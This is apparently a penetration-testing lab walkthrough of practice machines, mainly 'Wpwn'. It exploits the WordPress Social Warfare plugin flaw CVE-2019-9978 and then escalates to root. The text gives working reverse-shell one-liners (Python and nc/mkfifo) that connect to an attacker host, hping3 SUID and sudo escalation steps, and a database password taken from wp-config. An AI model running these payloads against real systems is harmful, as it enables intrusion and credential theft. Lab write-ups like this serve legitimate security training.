Download the python script and the sad.gif files to the same directory. Run with the syntax shown below.

python3 <User> <Pass> http://192.168.120.128/index.php

We can now run the following command to get a more usable reverse shell on a different listener:

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.49.120”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/sh”)’

From here I uploaded linpeas which after executing identified the binary hping3 as having a SUID bit set. Meaning we can execute the binary with root permissions.

Then as per GTFOBins we can executed with the SUID bit to gain a root shell.

/usr/sbin/hping3
/bin/sh -p
OR
./hping3
/bin/sh -p

pg-wpwn-play

Wpwn

Nmap
sudo nmap 192.168.178.123 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Running curl on port 80 simply shows a basic greeting for the machine by the creator.

With nothing else interesting we move onto directory enumeration with dirsearch.py.

sudo python3 dirsearch.py -u http://192.168.178.123/ -w /usr/share/seclists/Discovery/Web-Content/common.txt –full-url -t 75

With the common.txt wordlists we hit robots.txt and /wordpress. Robots contains no interesting information.

Moving over to the /wordpress directory we get the following page.

/wordpress

Other than this the WordPress site contains no interesting information. From here we can run WPScan in order to try and identify further information.

wpscan –url http://192.168.178.123/wordpress/ –passwords /usr/share/wordlists/rockyou.txt

WPScan picks up the plugin ‘social-warfare’ as being installed and out of date.

Checking this against searchsploit reveals a RCE against the running version.

searchsploit -w social warfare 3.5.2

The vulnerability has been assigned CVE-2019-9978.

Description:

The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.

The following GitHub shows a PoC for this exploit.

GitHub – hash3liZer/CVE-2019-9978: CVE-2019-9978 – (PoC) RCE in Social WarFare Plugin (<=3.5.2)
CVE-2019-9978 – (PoC) RCE in Social WarFare Plugin (<=3.5.2) – GitHub – hash3liZer/CVE-2019-9978: CVE-2019-9978 – (PoC) RCE in Social WarFare Plugin (<=3.5.2)
github.com

As per the GitHub description we need to create a text file that will be hosted on our attacking machine with the contents of what we want to execute.

<pre>system(‘command’)</pre>

First I hosted a Python SimpleHTTPServer on my attacking machine.

sudo python2 -m SimpleHTTPServer 443

I then downloaded the associated Python script and executed as per below.

python2 cve-2019-9978.py –target http://192.168.178.123/wordpress/ –payload-uri http://192.168.49.178:443/test.txt

In the example above the command included for test.txt was 'id'. From here I replaced the command with 'which nc' to see if netcat is on the target machine and then run the exploit again.

As netcat is installed we can replace the command in the test.txt file with that of a netcat reverse shell.

Contents of test.txt:

<pre>system(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.178 80 >/tmp/f’)</pre>

I then set a netcat listener on my attacking machine:

sudo nc -lvp 80

Running the exploit again hangs the script as we receive a reverse shell.

We then upgrade the shell:

/usr/bin/script -qc /bin/bash /dev/null

Moving back one directory in the shell we can then read the contents of wp-config for any MySQL database credentials.

We have gathered the credentials: wp_user:R3&]vzhHmMn9,:-5 From here I logged into MySQL and took the WordPress administrator’s hash. I was however, unable to crack. Looking on the box we have the user ‘takis’ I decided to see if password reuse was in play and SSH in as takis.

ssh takis@192.168.178.123

Now we are in as takis I then run sudo -l to check sudo permissions.

Looks like we can run all commands as any users without a password. A simple sudo /bin/bash will spawn us a root shell.